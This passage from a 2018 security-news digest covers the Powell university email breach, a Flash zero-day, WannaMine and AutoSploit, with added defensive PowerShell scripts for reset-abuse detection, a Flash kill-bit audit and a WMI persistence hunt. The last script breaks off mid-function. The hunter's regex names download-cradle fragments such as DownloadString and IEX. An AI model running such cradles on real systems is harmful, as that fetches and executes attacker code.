One day earlier, Thursday, Jan. 25, the DOJ announced that Jonathan Powell had been sentenced to six months in jail, 2 years supervised release and a restitution payment of $278,855 for computer fraud. He had obtained access to more than 1,000 email accounts from a New York City university in order to download sexually explicit photos and videos.

Powell had earlier pleaded guilty to the charge on August 9, 2017 in Manhattan federal court.

"Jonathan Powell used his computer skills to breach the security of a university to gain access to their students’ personal accounts," said U.S. Attorney Geoffrey S. Berman. "Once Powell had access, he searched the accounts for compromising photos and videos."

Specifically, he used the password reset utility to change email account passwords. He then used control over the email accounts to request password resets for the victims' online accounts such as iCloud, Facebook, Google, LinkedIn and Yahoo. "POWELL then logged into the Linked Accounts and searched within the Linked Accounts, gaining access to private and confidential content stored in the Linked Accounts," reports the DOJ announcement. "In one instance, POWELL searched a University-1 student’s linked Gmail account for digital photographs and for various lewd terms."

Subsequent analysis of logs showed that Powell had accessed the password reset utility approximately 18,640 times between October 2015 and September 2016, attempting 18,600 password changes in connection with more than 2000 unique email accounts -- succeeding in making 1378 changes to 1035 unique accounts.
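The log analysis described above is the kind of signal a self-service password reset portal should alert on before an intruder reaches 18,000 attempts. The following script is an added example, not code from the DOJ filing or the university; the log format ("timestamp,source_ip,account,result"), the sample lines and the thresholds are all constructed for the example. It groups reset attempts per source address, slides a window over them, and flags a source that touches more distinct accounts, or makes more attempts, than a legitimate user plausibly would.

```powershell
# Added example (not the DOJ's or the university's code). Hunts for the pattern
# in the Powell case: one source driving a large volume of password resets
# across many different accounts. The log below is constructed for the example:
# one line per reset attempt, "timestamp,source_ip,account,result".
$constructedLog = @'
2016-09-01T10:00:01,198.51.100.10,alice@univ.example,success
2016-09-01T10:07:40,198.51.100.11,bob@univ.example,success
2016-09-01T10:12:03,203.0.113.7,carol@univ.example,failure
2016-09-01T10:12:09,203.0.113.7,carol@univ.example,success
2016-09-01T10:12:31,203.0.113.7,dave@univ.example,success
2016-09-01T10:12:55,203.0.113.7,erin@univ.example,failure
2016-09-01T10:13:20,203.0.113.7,frank@univ.example,success
2016-09-01T10:13:48,203.0.113.7,grace@univ.example,success
2016-09-01T14:30:00,198.51.100.12,heidi@univ.example,failure
2016-09-01T14:31:10,198.51.100.12,heidi@univ.example,success
'@

function Find-ResetAbuse {
    param(
        [Parameter(Mandatory)][string]$LogText,
        [int]$WindowMinutes = 60,   # sliding window evaluated per source address
        [int]$MaxAccounts   = 3,    # distinct accounts one source may reset per window
        [int]$MaxAttempts   = 5     # total attempts one source may make per window
    )

    # Parse the CSV-style lines into objects; skip blank lines.
    $events = $LogText -split "`r?`n" | Where-Object { $_.Trim() } | ForEach-Object {
        $t, $ip, $acct, $res = $_.Split(',')
        [pscustomobject]@{
            Time    = [datetime]::Parse($t)
            Source  = $ip.Trim()
            Account = $acct.Trim()
            Result  = $res.Trim()
        }
    }

    foreach ($group in ($events | Group-Object Source)) {
        $sorted = @($group.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start  = $sorted[$i].Time
            $end    = $start.AddMinutes($WindowMinutes)
            $window = @($sorted | Where-Object { $_.Time -ge $start -and $_.Time -lt $end })
            $accounts = @($window.Account | Sort-Object -Unique)

            if ($accounts.Count -gt $MaxAccounts -or $window.Count -gt $MaxAttempts) {
                [pscustomobject]@{
                    Source      = $group.Name
                    WindowStart = $start
                    Attempts    = $window.Count
                    Accounts    = $accounts.Count
                    Succeeded   = @($window | Where-Object Result -eq 'success').Count
                }
                break   # one finding per source is enough to open a triage ticket
            }
        }
    }
}

Find-ResetAbuse -LogText $constructedLog | Format-Table -AutoSize
```

In the constructed sample, the two users who reset their own account once or twice stay under the thresholds, while the burst from 203.0.113.7 (six attempts against five different accounts inside two minutes) is what trips the distinct-account limit. The thresholds are deliberately low for the sample; tune them against a week of real portal traffic, and treat a reset that is immediately followed by reset requests to external providers (iCloud, Gmail, Facebook) from the same mailbox as a second, stronger signal.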

After his arrest, he admitted to compromising email accounts at other educational institutions in Arizona, Florida, Ohio and Texas.


Researchers discovered several zero-day flaws in ManageEngine products
2.2.2018 securityaffairs Vulnerability

Security experts at Digital Defense have discovered several vulnerabilities in the products of the Zoho-owned ManageEngine.
The list of vulnerabilities discovered includes a flaw that could be exploited by an attacker to take complete control over the vulnerable application.

The flaws affect ServiceDesk Plus, ServiceDesk Plus MSP, OpManager, Firewall Analyzer, Network Configuration Manager, OpUtils and NetFlow Analyzer.

ManageEngine has more than 40,000 customers worldwide and provides complete solutions for IT management.


One of the vulnerabilities affects the ManageEngine ServiceDesk Plus help desk software: the experts discovered an unauthenticated file upload flaw that an attacker could exploit to upload a JavaScript web shell and use it to execute arbitrary commands with SYSTEM privileges.

Researchers also discovered several blind SQL injection vulnerabilities that could be triggered by an unauthenticated attacker to take complete control of an application.

These ManageEngine products are also affected by an enumeration flaw that can be exploited to access user personal data, including usernames, phone numbers, and email addresses.

“[Digital Defense] announced that its Vulnerability Research Team (VRT) uncovered multiple, previously undisclosed vulnerabilities within several ManageEngine products, allowing unauthenticated file upload, blind SQL injection, authenticated remote code execution and user enumeration, potentially revealing sensitive information or full compromise of the application.” reads the press release issued by the company.

“Application layer vulnerabilities continue to be a key area of focus for software vendors,” said Mike Cotton, vice president of engineering at Digital Defense. “We are pleased to work collaboratively with affected vendors to facilitate prompt resolution, ensuring our clients and enterprises are protected from any potential exploitation of these vulnerabilities.”

ManageEngine promptly released security updates to address the vulnerabilities reported by the Digital Defense researchers.


(Unpatched) Adobe Flash Player Zero-Day Exploit Spotted in the Wild
2.2.2018 thehackernews Vulnerability

Another reason to uninstall Adobe Flash Player—a new zero-day Flash Player exploit has reportedly been spotted in the wild by North Korean hackers.
South Korea's Computer Emergency Response Team (KR-CERT) issued an alert Wednesday for a new Flash Player zero-day vulnerability that's being actively exploited in the wild by North Korean hackers to target Windows users in South Korea.
Simon Choi of South Korea-based cybersecurity firm Hauri first reported the campaign on Twitter, saying the North Korean hackers have been using the Flash zero-day against South Koreans since mid-November 2017.
Although Choi did not share any malware sample or details about the vulnerability, the researcher said the attacks using the new Flash zero-day are aimed at South Korean individuals who focus on researching North Korea.
Adobe also released an advisory on Wednesday, which said the zero-day is exploiting a critical 'use-after-free' vulnerability (CVE-2018-4878) in its Flash media software that leads to remote code execution.

The critical vulnerability affects Adobe Flash Player version 28.0.0.137 and earlier versions for:
Desktop Runtime (Win/Mac/Linux)
Google Chrome (Win/Mac/Linux/Chrome OS)
Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1)
"Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users," the advisory said. "These attacks leverage Office documents with embedded malicious Flash content distributed via email. Adobe will address this vulnerability in a release planned for the week of February 5."
To exploit the vulnerability, all an attacker needs to do is trick victims into opening a Microsoft Office document, web page, or spam message that contains a maliciously crafted Adobe Flash file.
The vulnerability can be leveraged by hackers to take control of an affected computer.
Choi also posted a screenshot to show that the Flash Player zero-day exploit has been delivered via malicious Microsoft Excel files.
Adobe said in its advisory that it plans to address the vulnerability in a "release planned for the week of February 5," though KR-CERT advises users to disable or completely remove the buggy software until then.


Meltdown/Spectre-based Malware Coming Soon to Devices Near You, Are You Ready?
2.2.2018 thehackernews  Safety

It has been only a few weeks since details of the Spectre and Meltdown processor vulnerabilities became public, and researchers have already discovered more than 130 malware samples trying to exploit these chip flaws.
Spectre and Meltdown are security vulnerabilities disclosed by security researchers on January 3 in many processors from Intel, ARM and AMD used in modern PCs, servers and smartphones, among other devices.
These CPU vulnerabilities could enable attackers to bypass memory isolation mechanisms and access everything, including memory allocated for the kernel containing sensitive data like passwords, encryption keys and other private information.
Researchers from independent antivirus testing firm AV-TEST detected at least 139 malware samples, as of today, which are related to these CPU vulnerabilities, as shown in the growth graph.
You can find SHA256 hashes for all malware samples here.

Meanwhile, cybersecurity firm Fortinet also tracked and analyzed many malware samples 'trying to exploit' recently disclosed CPU vulnerabilities, most of which includes re-compiled or extended version of the JavaScript-based proof-of-concept (PoC) exploit released last month.
"The rate at which the cybercriminal community is targeting known vulnerabilities is clearly accelerating, with the WannaCry and NotPetya exploits serving as perfect examples of the need to patch vulnerable systems as soon as possible," Fortinet said.
"Which is why our concerns were raised when we recently learned about some of the largest vulnerabilities ever reported—ones that affect virtually every processor developed since 1995 by chip manufacturers Intel, AMD, and ARM."
Another piece of news makes the situation even worse: Intel halted its CPU microcode (firmware) patches for the Meltdown and Spectre flaws last week after they caused spontaneous reboots and other 'unpredictable' system behaviour on affected PCs.
So, until Intel and other vendors deliver stable Meltdown and Spectre patches that don’t break systems, users should keep their operating system, web browsers, antivirus and other software up to date.


Increasing Number of Industrial Systems Accessible From Web: Study
2.2.2018 securityweek ICS
The number of industrial control systems (ICS) accessible from the Internet has increased significantly in the past year, reaching more than 175,000 components, according to a new report from Positive Technologies.

Using the Shodan, Censys and Google search engines, researchers identified 175,632 ICS components accessible from the Web. In comparison, similar searches conducted in the previous year uncovered just over 162,000 systems.

Of all the systems identified in 2017, more than 66,000 were accessible via HTTP, followed by the Fox building automation protocol associated with Honeywell’s Niagara framework (39,000), Ethernet/IP (25,000), BACnet (13,000), and the Lantronix discovery protocol (10,000).

The highest percentage of exposed devices, representing 42% of the total, was spotted in the United States. The number of Internet-accessible ICS components in the U.S. increased by 10% compared to 2016, from roughly 50,000 to 64,000. The U.S. is followed at a distance by Germany (13,000 accessible systems), France (7,000), and Canada (7,000).

Many of the industrial systems connected to the Web come from Honeywell (26,000), Lantronix (12,000), SMA (9,000), Beck IPC (9,000), Siemens (6,000) and Rockwell Automation (5,000).

The distribution of Internet-exposed components by type has remained largely the same compared to 2016.

(Figure: Types of ICS components exposed to the Internet)

John Matherly, CEO of the search engine Shodan, has confirmed for SecurityWeek that there has been an increase of roughly 10% year-over-year in terms of ICS exposure on the Internet.

“The increase is mostly in building automation protocols and despite the news coverage we haven't seen any decrease in devices,” Matherly said.

According to Positive Technologies, a total of nearly 200 new vulnerabilities were disclosed in 2017, compared to 115 in 2016. Worryingly, 61% of the flaws whose existence was made public last year were rated critical and high severity.

The most common types of vulnerabilities were remote code execution (24%), information disclosure (17%), and buffer overflows (12%). “Most vulnerabilities detected in 2017 can be exploited remotely without needing to obtain any privileges in advance,” Positive Technologies said in its report.

A report published in October by CyberX revealed that one-third of industrial and critical infrastructure systems had been connected to the Internet, based on data obtained by the industrial security firm by passively monitoring traffic from hundreds of operational technology (OT) networks.


AutoSploit: Automated Hacking Tool Set to Wreak Havoc or a Tempest in a Teapot?
2.2.2018 securityweek Virus

AutoSploit Automatically Finds Vulnerable Targets via Shodan and Uses Metasploit Exploits to Compromise Hosts

AutoSploit is a tool designed to automate the use of Metasploit exploits. It was announced on Twitter on Wednesday.

"I just released AutoSploit on #Github. #Python based mass #exploit #tool. Gathers targets via #Shodan and automatically invokes selected #Metasploit modules to facilitate #RCE," announced Twitter user VectorSEC, Wednesday. Just to be clear, this tool automatically finds vulnerable targets and uses Metasploit exploits to provide remote code execution for the user.

No great skill is necessary: all that is required is AutoSploit (available from GitHub), Python Blessings, Shodan, and Metasploit. Shodan locates the targets, Metasploit provides the exploits, and AutoSploit actions them. Since new vulnerability exploits are added to Metasploit faster than many companies can apply vulnerability patches, the immediate concern is whether this new tool will further commoditize cybercrime by facilitating a new army of unskilled, wannabee, skiddie, hackers able to hack computers automatically.

Just how dangerous is this? Opinions are varied. "[AutoSploit] makes being a script kiddie infinitely easier," comments Chris Morales, head of security analytics at Vectra Networks. "It is combining a whole set of automated tools for identifying exposed hosts and then executing exploits. Where I think this will have the most dramatic effect, and what scares me most, is with IoT. I’m predicting a rash of new IoT DOS, cryptocurrency mining, and general debauchery."

But he notes that it will simply lead to a compromised host -- something security teams have to handle every day. There is still time for incident response. "We cannot rely on prevention and need to be vigilant in finding attackers once they infect systems and before they can cause real damage.”

Chris Roberts, chief security architect at Acalvio, agrees that it will attract the wannabees. “Good to know we’ve weaponized for the masses. Everyone can now be a script kiddie simply by plugging, playing and attacking." But he points out that attack tools with 'very nice interfaces' are not new, and only exist because the root problem is the bad products, code, systems and infrastructures used by everyone.

"The kids are not more dangerous," he says. "They already were dangerous. We’ve simply given them a newer, simpler, shinier way to exploit everything that’s broken. Maybe we should fix the ROOT problem.”

"The basic functionalities [of AutoSploit] were already accessible," says ESET senior research fellow, David Harley, "but AutoSploit lowers the level of knowledge and competence necessary to take advantage of them. So, I guess there could be more skiddies snapping at the heels of companies and individuals whose patching isn’t up to scratch."

He warns that companies cannot rely on prevention technologies to neutralize AutoSploit. "Security companies watch Metasploit with the intention of remediating where they can, so some (at least) of the modules used will be less effective on well-protected systems. Sadly, not every exploit can be 100% defended against by third-party security software. Not every system out there is well-protected. And it sounds as if AutoSploit will make it easier to find and probe systems that are less likely to be properly patched or defended with security software. Like the Internet-of-unnecessarily-interconnected-things…"


There are others who simply dismiss AutoSploit. Jerry Gamblin, lead security analyst at Carfax, tweeted, "While everyone is freaking out I hacked together antiautosploit to stop autosploit from sploiting you (This just blocks Shodan from scanning you)."

The general consensus from the security industry seems to be that AutoSploit will attract the kiddies but won't change the current threat landscape -- beyond perhaps making existing good practice (patching, incident response) more important and urgent.

"This doesn't really change anything from way things are already," says F-Secure principal researcher Jarno Niemela. "My 11-year-old son learned Metasploit when he was 10 years old, and there is a ton of tradecraft videos in YouTube for anyone who is interested... This tool simply makes something that was already very easy just a bit easier."

But he also has a word of warning for wannabees attracted by AutoSploit. "The fact that something is really easy, does not make unauthorized computer access any less a crime. And tools like this leave a forensic footprint that is miles wide. Yes, you can compromise poorly protected systems very easily with this tool, but you can also end up in a lot of trouble."


Legacy Malware and Legacy Systems Are Not a Legacy Problem
2.2.2018 securityweek Virus
Companies must be wary of chasing shiny new threats with shiny new defenses, while leaving legacy systems vulnerable to legacy malware.

Trend Micro calls the legacy threat 'Throwhack'; after the more benign 'Throwback Thursday' social media trend; but, says principal security strategist Bharat Mistry in a blog published today, "there’s nothing entertaining about this list of legacy security challenges."

Mistry points to Conficker (dating back to 2008). "Throughout 2017 we saw monthly detections of around 20,000; meaning it’s still highly active." In conversation with SecurityWeek, he agreed that the majority of detections were in the Far East with few appearing in the U.S. or Europe; but warned that Far East breaches could get into the supply chain of Western organizations.

Heartbleed is another old threat that hasn't gone away. "Despite surfacing and being patched in 2014, nearly 200,000 servers and devices were reported as exposed last year."

The problem goes deeper than just old malware -- it is exacerbated by the continued use of old and unsupported systems. "Spiceworks has claimed that 68% of US, Canadian and US firms still run Office 2007, while it has also been reported that around 20% of US and UK healthcare organizations still run Windows XP. It doesn’t take much to understand the dangers of running unsupported systems," he writes.

One of the problems, he told SecurityWeek, is that new security products are not always old problem aware. "Machine learning systems," he said, "often 'learn' to detect malware based on current threats. They simply aren't taught to detect old behaviors; and can miss them."

To be fair, he isn't advocating abandoning new machine-learning detection products or methods, only pointing out that on their own they aren't enough. "Wherever possible," he said, "organizations should employ traditional anti-malware products as well as new machine learning products." He added that competition from the smaller processing overhead of ML systems has spurred traditional anti-malware vendors to design and implement new approaches that reduce their own overhead.

Nevertheless, he stresses that one of the best solutions to legacy malware is to update or upgrade legacy systems: newer versions of old operating systems are no longer susceptible to old vulnerabilities.

"If updating your OS is not possible, for whatever reason, use vulnerability shielding/virtual patching on the endpoint or intrusion prevention at the network level. It’s ideal for mitigating the impact of older malware like Conficker which exploits vulnerabilities. It protects legacy systems by providing convenient and automatic updates, allowing organizations to maintain protection while minimizing their patch management costs."


South Korea Warns of Flash Zero-Day Exploited by North Korea
2.2.2018 securityweek BigBrothers
South Korea’s Internet & Security Agency (KISA) has issued an alert for a zero-day vulnerability in Flash Player that has reportedly been exploited in attacks by North Korean hackers.

Few details have been provided, but KISA says the vulnerability affects Flash Player 28.0.0.137 and earlier. Version 28.0.0.137 is the latest, released by Adobe in January as part of the Patch Tuesday updates.

The security hole can be exploited by getting a user to open a document, web page or email containing a specially crafted Flash file, KISA said on Wednesday.

Simon Choi of South Korea-based cybersecurity firm Hauri said on Twitter the Flash Player zero-day has been exploited by North Korea since mid-November 2017 in attacks aimed at South Korean individuals who focus on researching North Korea.

According to the expert, the flaw has been leveraged to distribute malware. A screenshot he posted appears to show that the exploit has been delivered via malicious Microsoft Excel files.
Flash zero-day exploited by North Korea - credits: Simon Choi (@issuemakerslab)

SecurityWeek has reached out to Adobe for comment and will update this article once the company responds. Since the activities of North Korean threat actors have been closely monitored by several security firms, it’s possible that Adobe has already been made aware of the zero-day and is working on a patch.

UPDATE. Adobe says it's aware of a report that an exploit for a vulnerability it tracks as CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. The company says it will address the flaw with an update planned for the week of February 5.

In an advisory, Adobe said the vulnerability is a critical use-after-free that allows remote code execution. Until a patch becomes available, the company has provided some mitigations.

"Beginning with Flash Player 27, administrators have the ability to change Flash Player's behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing SWF content," Adobe said. "Administrators may also consider implementing Protected View for Office. Protected View opens a file marked as potentially unsafe in Read-only mode."
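Both of Adobe's interim mitigations are registry-driven on Windows, so they can be audited rather than taken on trust. The script below is an added example, not Adobe's or Microsoft's code. It reads the Office Protected View settings for Word, Excel and PowerPoint (a value of 1 under the keys below disables that part of Protected View), then reports whether the COM kill bit (Compatibility Flags 0x400) is set for the Flash ActiveX control in the locations Internet Explorer and Office consult. The Office version string '16.0', the application list and the -Harden switch are assumptions made for the example; verify the kill-bit key paths against current Microsoft guidance for your Office build before relying on them.

```powershell
# Added example, not Adobe's or Microsoft's code. Audits the two mitigations
# from Adobe's CVE-2018-4878 advisory on a Windows host with Office 2016
# ('16.0' is an assumption; adjust for other versions) and, with -Harden
# (hypothetical switch), sets the kill bit that stops IE and Office from
# instantiating the Flash ActiveX control. Run elevated for -Harden.
[CmdletBinding()]
param([switch]$Harden)

$officeVersion = '16.0'
$apps = 'Word', 'Excel', 'PowerPoint'
# A value of 1 in any of these disables that part of Protected View.
# (The misspelling "Attachements" is the real value name.)
$pvValues = 'DisableAttachementsInPV', 'DisableInternetFilesInPV', 'DisableUnsafeLocationsInPV'

foreach ($app in $apps) {
    $roots = @(
        "HKCU:\Software\Microsoft\Office\$officeVersion\$app\Security\ProtectedView"
        "HKCU:\Software\Policies\Microsoft\Office\$officeVersion\$app\Security\ProtectedView"
    )
    foreach ($root in $roots) {
        # An absent key means Office defaults apply, and the default is Protected View on.
        if (-not (Test-Path $root)) { continue }
        $props = Get-ItemProperty -Path $root
        foreach ($v in $pvValues) {
            if ($props.$v -eq 1) {
                Write-Warning "${app}: $v=1 under $root (Protected View disabled)"
            }
        }
    }
}

# CLSID of the "Shockwave Flash Object" ActiveX control. Compatibility Flags
# 0x400 is the COM kill bit; IE reads it from 'ActiveX Compatibility' and
# Office from 'COM Compatibility'. Both registry views are checked so 32-bit
# Office on 64-bit Windows is covered.
$flashClsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}'
$killBitKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$flashClsid"
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$flashClsid"
    "HKLM:\SOFTWARE\Microsoft\Office\Common\COM Compatibility\$flashClsid"
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\$flashClsid"
)

foreach ($key in $killBitKeys) {
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    $killed = (([int]$flags) -band 0x400) -ne 0
    '{0,-6} {1}' -f $(if ($killed) { 'KILLED' } else { 'open' }), $key
    if ($Harden -and -not $killed) {
        New-Item -Path $key -Force | Out-Null
        New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord -Value 0x400 -Force | Out-Null
    }
}
```

The kill bit is a blunt instrument: it disables Flash in Internet Explorer and in embedded Office objects entirely rather than prompting, which is exactly what you want while an in-the-wild exploit has no patch, but it will break any line-of-business content that still depends on Flash. Protected View only helps if the user does not click "Enable Editing" on a mail attachment, so treat the audit as a control check, not a guarantee.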


Kaspersky Launches New Security Product for Exchange Online
2.2.2018 securityweek Safety
Kaspersky Lab has expanded its small and medium-sized business (SMB) offering with a new cloud-based product designed to provide an extra layer of security for the Exchange Online email service in Microsoft Office 365.

The new product, Kaspersky Security for Microsoft Office 365, is designed to protect users against malware, phishing, spam, and other email-borne threats.

Exchange Online includes built-in anti-malware and anti-spam features, but Kaspersky says its own product – part of the company’s Business Hub offering – works in conjunction with Microsoft’s protections and offers native integration.

Kaspersky says its product relies on various security technologies, including machine learning-based detection, an anti-phishing engine that uses neural networks, sandboxing, attachment filtering mechanisms, and data from the company’s threat intelligence network.

The new product analyzes incoming emails and places suspicious messages in quarantine. Administrators are informed of the potential threats via a central console shared with the Kaspersky Endpoint Security Cloud product. The console allows customers to view each potentially malicious email and restore them in case of false positives.

According to the security firm, Kaspersky Security for Microsoft Office 365 is capable of recognizing if a file attached to an email is the type it claims to be, and it can detect malicious macros hidden in harmless-looking Office documents.


Since there has been a lot of debate recently on the implications of the physical location of data stored in the cloud, Kaspersky allows users to specify which data center they want to use for processing emails.

Furthermore, given the recent controversy regarding the company uploading sensitive files from an NSA contractor’s computer to its own servers, Kaspersky has highlighted that the new product does not upload any files to its systems. Instead, quarantined emails are stored in the customer’s Exchange Online account.


Watch out, cyber criminals are using fake FBI emails to infect your computer
2.2.2018 securityaffairs BigBrothers

The FBI Internet Crime Complaint Center (IC3) is warning of a new malware campaign aimed at infecting victims with weaponized attachments.
The Feds’ Internet Crime Complaint Center (IC3) is warning of a new spam campaign that infects victims with malware. According to an alert issued on Wednesday by the IC3, numerous citizens filed complaints after receiving emails purporting to come from the IC3. The message claims the recipient is owed compensation for a cyber attack and asks them to fill in the attached document, but the file is laced with malware.

The cover story is interesting: the email claims that a Nigerian cyber criminal has been arrested and that the feds found the recipient’s email address on the alleged scammer’s PC. It asks the victim to return the document with their details and wait for the refund to arrive. Once the victim opens the document, the infection process starts.


The FBI has identified at least three other versions of the IC3 impersonation scam:

“The first involved a fake IC3 social media page, which advertised itself as the FBI Cyber Crime Department (IC3) and requested recipients provide personal information in order to report an internet crime.” states the alert issued by the FBI.
“The second involved an email which stated the recipient was treated unfairly by various banks and courier companies. The email claimed the recipient’s name was found in a financial company’s database and that they will be compensated for this unfair treatment.”
“The third example involved an email from the Internet Crime Investigation Center/Cyber Division and provided an address in Minneapolis, Minnesota. The email also included a case reference number in the subject line. The email informed the recipient that their IP address was referred to the IC3 as a possible victim of a federal cyber-crime. The email then requests the recipient to contact the sender via telephone.”
The FBI is currently investigating the cases. Victims of an online scam can file a complaint with the IC3 at www.ic3.gov.


WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit
2.2.2018 securityaffairs Virus

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.
This morning I wrote about the Smominru botnet that used NSA exploit to infect more than 526,000 systems, and I explained that other threat actors are using similar techniques to mine cryptocurrency.

This is the case of a strain of the Monero crypto-mining worm dubbed WannaMine that spreads leveraging the EternalBlue exploit.

ETERNALBLUE is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack, it targets the SMBv1 protocol and has become widely adopted in the community of malware developers.

In June, following the WannaCry attacks, experts discovered that at least three other groups had been leveraging the NSA EternalBlue exploit.

Back to the present, WannaMine was developed to mine the Monero cryptocurrency abusing victims’ resources. According to security researchers at CrowdStrike, the malicious code is very sophisticated, it implements a spreading mechanism and persistence model similar to those used by state-sponsored APT groups.

“CrowdStrike has recently seen several cases where mining has impacted business operations, rendering some companies unable to operate for days and weeks at a time. The tools have caused systems and applications to crash due to such high CPU utilization speeds.” reads the analysis published by CrowdStrike.

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent CrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur the lines between nation-state and eCrime tactics.”

WannaMine is a fileless miner that was first reported by researchers at Panda Security.


The malicious code uses so-called “living off the land” techniques to gain persistence on the infected system, leveraging Windows Management Instrumentation (WMI) permanent event subscriptions. WannaMine registers a permanent event subscription whose event consumer runs a PowerShell command every 90 minutes.
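WMI permanent event subscriptions (the persistence used by WannaMine here, and the WMI component Proofpoint noted in Smominru earlier on this page) live in three classes under root\subscription: an __EventFilter (the WQL trigger), an __EventConsumer subclass (what runs) and a __FilterToConsumerBinding that ties them together. Legitimate subscriptions are rare on most hosts, so listing all of them and flagging any consumer that launches a script host is a cheap, high-signal hunt. The script below is an added example, not CrowdStrike's, Proofpoint's or Microsoft's code; the -Remove switch and the regex of suspicious command fragments are assumptions made for the example, and the WQL shown in a comment only illustrates the shape of an interval-based trigger, not WannaMine's exact query.

```powershell
# Added example, not CrowdStrike's, Proofpoint's or Microsoft's code.
# Lists every WMI permanent event subscription on the host and flags the ones
# whose consumer launches a script host, which is how WannaMine's 90-minute
# PowerShell trigger persists. Run elevated; read-only unless -Remove is given
# (-Remove is a hypothetical switch that deletes the flagged subscriptions).
[CmdletBinding()]
param([switch]$Remove)

$ns = 'root\subscription'
# Consumer payloads that almost never appear in legitimate subscriptions.
$suspicious = 'powershell|pwsh|cmd\.exe|wscript|cscript|mshta|regsvr32|rundll32|-enc|FromBase64String|DownloadString|IEX'

$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
# __EventConsumer is the abstract base class, so this returns every consumer
# type (CommandLineEventConsumer, ActiveScriptEventConsumer, ...).
$consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)

$findings = foreach ($b in $bindings) {
    # Filter and Consumer are object references; resolve them by Name, the key.
    $f = $filters   | Where-Object Name -eq $b.Filter.Name
    $c = $consumers | Where-Object Name -eq $b.Consumer.Name
    # CommandLineEventConsumer carries the command line; ActiveScriptEventConsumer the script body.
    $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
    [pscustomobject]@{
        Filter       = $f.Name
        # Interval triggers look like: SELECT * FROM __InstanceModificationEvent WITHIN <seconds> WHERE ...
        Query        = $f.Query
        ConsumerType = $c.CimClass.CimClassName
        Consumer     = $c.Name
        Payload      = $payload
        Suspicious   = [bool]($payload -match $suspicious)
        BindingObj   = $b
        FilterObj    = $f
        ConsumerObj  = $c
    }
}

$findings | Select-Object Filter, ConsumerType, Suspicious, Query, Payload | Format-List

if ($Remove) {
    foreach ($x in ($findings | Where-Object Suspicious)) {
        # Remove the binding first so nothing fires while the pieces are torn down,
        # then the now-orphaned filter and consumer.
        Remove-CimInstance -InputObject $x.BindingObj
        Remove-CimInstance -InputObject $x.FilterObj
        Remove-CimInstance -InputObject $x.ConsumerObj
        Write-Warning "Removed WMI subscription '$($x.Filter)' -> '$($x.Consumer)'"
    }
}
```

Review the unflagged entries too: an unfamiliar filter name paired with an innocuous-looking consumer still deserves a look, and the miner's execution itself will also show up as WmiPrvSE.exe spawning powershell.exe in process-creation telemetry (Sysmon event 1 or Windows event 4688), which is the complementary detection to run against endpoints you cannot query live.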

Experts noticed that the malware uses the credential harvester Mimikatz to collect users’ credentials and reuse them for lateral movement. If it cannot move laterally with the stolen credentials, it falls back on the EternalBlue exploit.

WannaMine is able to infect systems running all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” CrowdStrike concluded.

WannaMine degrades the performance of infected machines; on laptops, the miner could even cause physical damage from overheating if it runs continuously for several hours.

Sophos experts published an interesting Q&A post on WannaMine.


WannaMine Malware Spreads via NSA-Linked Exploit
1.2.2018 securityweek Virus Exploit
A piece of crypto-mining malware is using sophisticated tools for its operations, including a Windows exploit linked to the National Security Agency, security researchers warn.

Dubbed WannaMine, the crypto-mining worm spreads using EternalBlue, the NSA-linked tool that became public in April 2017, just one month after Microsoft released a patch for it.

Leveraging a vulnerability in Windows’ Server Message Block (SMB) on port 445, the exploit became famous after the WannaCry ransomware was found exploiting it for distribution. Other malware families abused it as well, including botnets, backdoors, NotPetya, and banking Trojans.

Now, the same exploit is being used to spread WannaMine, a piece of malware focused on mining for the Monero crypto-currency, but which uses sophisticated capabilities, such as persistence and distribution mechanisms similar to those used by nation-state actors, CrowdStrike says.

WannaMine, the security researchers explain, employs “living off the land” techniques for persistence, such as Windows Management Instrumentation (WMI) permanent event subscriptions. The malware has a fileless nature, leveraging PowerShell for infection, which makes it difficult to block without the appropriate security tools.

The malware uses credential harvester Mimikatz to acquire legitimate credentials that would allow it to propagate and move laterally. If that fails, however, the worm attempts to exploit the remote system via EternalBlue.

To achieve persistence, WannaMine sets a permanent event subscription that would execute a PowerShell command located in the Event Consumer every 90 minutes.
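The 90-minute PowerShell consumer described above (and in the securityaffairs write-up earlier on this page) is the artifact a responder can go looking for. The PowerShell below is an added example, not CrowdStrike’s tooling or the malware’s own code: it walks the three objects that make up a permanent WMI subscription in the root/subscription namespace (the __EventFilter that fires, the __EventConsumer that runs something, and the __FilterToConsumerBinding that ties them together), reports what each consumer would execute, and flags consumers whose payload looks like a PowerShell download cradle. The regex and the output field names are our own heuristics; removal is a separate, opt-in step because legitimate management software also registers permanent subscriptions.

```powershell
# Hunt for WMI permanent event subscriptions of the kind WannaMine uses.
# Added example, not CrowdStrike's or the malware's code. Run as administrator.
# The "suspicious" regex and the output field names are our own choices.

function Get-WmiSubscriptionName {
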